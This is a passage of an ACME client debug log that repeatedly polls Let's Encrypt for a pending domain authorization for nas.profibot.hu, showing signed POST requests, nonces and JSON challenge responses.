58tS3qjE3D-TnO1lSY4ZaZjDVdGKuo0HnehuCLxlY4FIWwV4wFM +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:05:29,441:DEBUG:acme.client:Storing nonce: 58tS3qjE3D-TnO1lSY4ZaZjDVdGKuo0HnehuCLxlY4FIWwV4wFM +2025-12-25 04:05:29,441:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:05:32,442:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:05:32,446:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRTNELVRuTzFsU1k0WmFaakRWZEdLdW8wSG5laHVDTHhsWTRGSVd3VjR3Rk0iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "dz7mtIF4wYl31N38nDz9ep2_Zhdj-lACzB2xangBdbGlnPIx8idKgCjZzg6f6LTHNf0QTt_7FcehtMfEsENRRnE1DjD1LlJOUK0HniqfPSbVRCqxS8I5_arzSG-JS0yYUxCWbrA9QsGxmzVBw7xlUyxAdjdyeUIbeCt0JAWpEQbAFHkGvKhb91OI3c_F-YpHOcFtHaFGFYU_lY3OScfbQ_63G1pidRVqaaGINweAGDVFXx-6-fOrFqRJdA3Pi2iNeotqjvDEdrmSTL0Ecl-7CnZXRuMspiEdoAMKVvVL-olBk0JSHJAKhdckvHu98kfCH6vzx8M7Vv7l6juuIcJUrA", + "payload": "" +} +2025-12-25 04:05:32,615:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:05:32,615:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:05:32 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEN4WDCbQuzYFuHDi1A0N95ITbLD4iv9DqWP8beotT4mY +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:05:32,616:DEBUG:acme.client:Storing nonce: 58tS3qjEN4WDCbQuzYFuHDi1A0N95ITbLD4iv9DqWP8beotT4mY +2025-12-25 04:05:32,616:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:05:35,617:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:05:35,621:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRU40V0RDYlF1ellGdUhEaTFBME45NUlUYkxENGl2OURxV1A4YmVvdFQ0bVkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "Sw4jKTQpatUw4i9EFCxN-Qb4vo978R5nqAtIkRzXggKLVdWHyfqTZq2y8mK70VDPZjnXZES2YESg4As_5PYElp_iH6wBIBdCWokIm7kXjUURh8SuOPll1uhlE7jPSoilM2dtKKFyojzh6olwzeveHOKAknZbKvnpqEB6AbNM35CS8AS9FurknT6UaCEIgn5fZsnkEDwi1y3QII1kV9YZitupHt3I8c9o9rm0q_35ZGPAiZ9TZqB1HRrInW5zjYZHDGSatLcK8_kdDN-bZEe4Jguq4moqfLh_5yYBqFE6B2FK-Wh53ACibqKoWCNeYipIlXn9hl4wBUYu65a307qimw", + "payload": "" +} +2025-12-25 04:05:35,777:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:05:35,778:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:05:35 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJccDE1kVKs0Dl3TMLWKhDZ1MtJBcBUjhyGU5le5AC6QQ +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:05:35,779:DEBUG:acme.client:Storing nonce: fULB7aUJccDE1kVKs0Dl3TMLWKhDZ1MtJBcBUjhyGU5le5AC6QQ +2025-12-25 04:05:35,779:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:05:38,780:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:05:38,783:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSmNjREUxa1ZLczBEbDNUTUxXS2hEWjFNdEpCY0JVamh5R1U1bGU1QUM2UVEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "A4jR_jQwhZEK2j7voi4DYeDAUK-CUgUy26Ue-D9GcMN17ONsn0vdjI6_IDbCb4cvXPDehkvqX8xy39brj8iyK5SXHjS3ReGI2Hy2RneULzM_Cdxkd8530zvMKyiTipOhKp2PAt31eqXJh3nLnvnn9owglnJaqERg1-CIWrLoMOWSFCj35gf159CN6eUjF9fbneVBay-ydT3con5eYyP4K0odp3cY4-WvXsf6t_osl2KJGWVC4HTaQzrmT3SDhI82jwuJYFbULhSR48wmmdd5PG9IIQmBuTYVMrycsyhPWlfLkiHkc9agfqQ4b017NX8JvulIibTtvcDRh-JXxgH5oQ", + "payload": "" +} +2025-12-25 04:05:38,938:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:05:38,939:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:05:38 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEXyOD4iJx_bW9z_9LmdIQh0oJyLevIzIr2N3S-sShmiI +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:05:38,940:DEBUG:acme.client:Storing nonce: 58tS3qjEXyOD4iJx_bW9z_9LmdIQh0oJyLevIzIr2N3S-sShmiI +2025-12-25 04:05:38,940:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:05:41,941:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:05:41,945:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRVh5T0Q0aUp4X2JXOXpfOUxtZElRaDBvSnlMZXZJeklyMk4zUy1zU2htaUkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "lkz5kzTq2FwGqEaOcqc-yJzAkos2MXTSGYilWuYgmZ1zPKe3jdfPb_LhN9aKhkAlvAIO6_SRo85WK8h5Vjhr1BDED3KMtbtdO1jiun8zedfi6kn0Gc4SBS38ksYgdpH_4aWiMhlNfi5n9z6qCu2HhyOGEko6nfo1eEaYWyY7Vre4QCU-YtlLPpPKhXup9f_27xiOWQ9hLirTmZVqQTR_qBw3Wh-9-ZSnbYoiWLORqHqMV9zpEBpJdQk_tns633s1FPAvkl3G6eLxX6DLoP4CfcW1rFZX9q2GTPHkgQGl7QL6Ww95EuQKhqrOb2JSQXspqOi-Ko9N0ba2SoP0yELkMA", + "payload": "" +} +2025-12-25 04:05:42,101:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:05:42,102:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:05:42 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjE7OHvvsV9owlLbQOPN0Zm-6Km8TM100VtPNTel8OuUvE +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:05:42,103:DEBUG:acme.client:Storing nonce: 58tS3qjE7OHvvsV9owlLbQOPN0Zm-6Km8TM100VtPNTel8OuUvE +2025-12-25 04:05:42,103:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:05:45,104:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:05:45,108:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRTdPSHZ2c1Y5b3dsTGJRT1BOMFptLTZLbThUTTEwMFZ0UE5UZWw4T3VVdkUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "MIKjkGiE-VD1qcxHbOv53tKJ6SHreBmnMT9VpQAy0xoRO1wZaXM9bf_vrxl6zlx50VFBzK0OiBigPhi32R1S3AkyWAIWRxTBVdhNWYP1Sus1e3Xuctj2aE_dH8WQCLDG0fVeRVZHqnjqAHWMbu_sYvU7O7fZmpUYz-ApUgJ_Q-jtTUOuMITGDJLiMGCCla3xyDqWzXG5IUCShy1w_uzun26-bMTCFzyarw1WIlvXnX4aDgh9rxNJYEwmCBzJMnrJ0WsgJoHKZX5pAB84w5Xoy22pKaE9n8X5_ZEmsBK4nw3ilSrr1KhnQpSH29TrWBzj4NHBjvThnESl5N0ZvSSQFQ", + "payload": "" +} +2025-12-25 04:05:45,263:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:05:45,264:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:05:45 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJvs1yC84_AmQj9M3siqyBKwLHJgVQHQbXhsLMtXME-h4 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:05:45,265:DEBUG:acme.client:Storing nonce: fULB7aUJvs1yC84_AmQj9M3siqyBKwLHJgVQHQbXhsLMtXME-h4 +2025-12-25 04:05:45,265:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:05:48,266:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:05:48,270:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSnZzMXlDODRfQW1RajlNM3NpcXlCS3dMSEpnVlFIUWJYaHNMTXRYTUUtaDQiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "VJp4F9b_ZCrxvhg3xFN3gEqPG2oQiC2D6-X4NqF3wakqg57c_R16hPgx6GPLyHiEEOzCeaQxc_E2ei5C-EKdtBIko4LkeFFhVlkaPKDuVtmbTp_1sH04-VZ9SDBJSyAXLkEV4spPUim248qbjiTwD-HIK4z40z8_7OdWAvDwGvup3BtWAD1VB6xrj8rjdNOrxpnHWYJbdE3B8ytWS3zpYJJTu5ynKxMF73YUx58G5q9dPM7C-6UU6HdtEd5zZmRvuXW46HyGmQyIgoixpl1hU4eEYZez5FTwHt4H7XrN1noNYoSuTKQO4xp3twJSwsaKqpbFHVzvBIT2nFDziPvjJA", + "payload": "" +} +2025-12-25 04:05:48,425:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:05:48,426:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:05:48 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEEkhs-yGXyKE0aH5sWL45wWfzsvp4n8RyV6DE8mY4wJA +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:05:48,433:DEBUG:acme.client:Storing nonce: 58tS3qjEEkhs-yGXyKE0aH5sWL45wWfzsvp4n8RyV6DE8mY4wJA +2025-12-25 04:05:48,433:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:05:51,434:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:05:51,438:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRUVraHMteUdYeUtFMGFINXNXTDQ1d1dmenN2cDRuOFJ5VjZERThtWTR3SkEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "YRzP5V6BsVUznXdkcFb4tRoYQKd7Mv72ilXgfzY9ohr73U2NPKErR5YwT2l5MD5iXAqCI72SmQvZXgp1mqwJhNxwwbK8TXlJHbMBvUjbDMEs_Y6SUiME50tbsLGsyo9ECC2wfZqbPXvHjtpdjwhnu6Bl8lNURA8QvRvcak1p4wWq-uGNbC2bSXl4xbNGccYHfWgcV7Ymer3g6lrMO2BZ1nYk5bdeYJLV37Qw0_sQd0ad_7pIXohhxqtB-W4FBmlkq-Rl6TvLr_R8VO0iiYJc2W8n_u3_TAVN9D2HjG6WsYf_b7itOUI7Dh8f14CpjOxmEaaFs0RLzlWSfA4IN4ZQXA", + "payload": "" +} +2025-12-25 04:05:51,594:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:05:51,595:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:05:51 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjE_Es8hRMsfUfYJIZ8mO41cu8Prmg5EoQ1VGTCD0e05BU +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:05:51,596:DEBUG:acme.client:Storing nonce: 58tS3qjE_Es8hRMsfUfYJIZ8mO41cu8Prmg5EoQ1VGTCD0e05BU +2025-12-25 04:05:51,596:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:05:54,597:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:05:54,601:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRV9FczhoUk1zZlVmWUpJWjhtTzQxY3U4UHJtZzVFb1ExVkdUQ0QwZTA1QlUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "V9FUfbs0wH2S4eZ6jRzzdzEHNQ-eTPD5ZH8-bEMtXpWMv7SXmfzbdcWavUoFzbV_hMtfuVqe7yQfwAYDIuvSV2x9rjt4P7df70AOkfS1ft7CmmLpWY6BVN_BLzLEa0GtKk96QZPpSZDq1PWDnbnUycSULBin1IS63uPeybVDvEGEqs8ScRpky0O82Fl6u7Q-bzuuv4FQ1GcNETnggYLy5bvPhi8HWnLJPQDsmFU4keQqvcEp5X-dzQJaF_AX1rRyRLTLhhMOJilcuH0rc0m31SNtwUrrk0HcB0ICfnTmdLunXLaJmo9HMJvGBr7WeRRKagOlgKTRhm5zi4vT0Tb-3g", + "payload": "" +} +2025-12-25 04:05:54,769:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:05:54,770:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:05:54 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEcCNpBrCRybrpoYXZmkOQmRQvjhG4y8WpWVEggJPngPA +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:05:54,771:DEBUG:acme.client:Storing nonce: 58tS3qjEcCNpBrCRybrpoYXZmkOQmRQvjhG4y8WpWVEggJPngPA +2025-12-25 04:05:54,771:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:05:57,772:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:05:57,776:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": 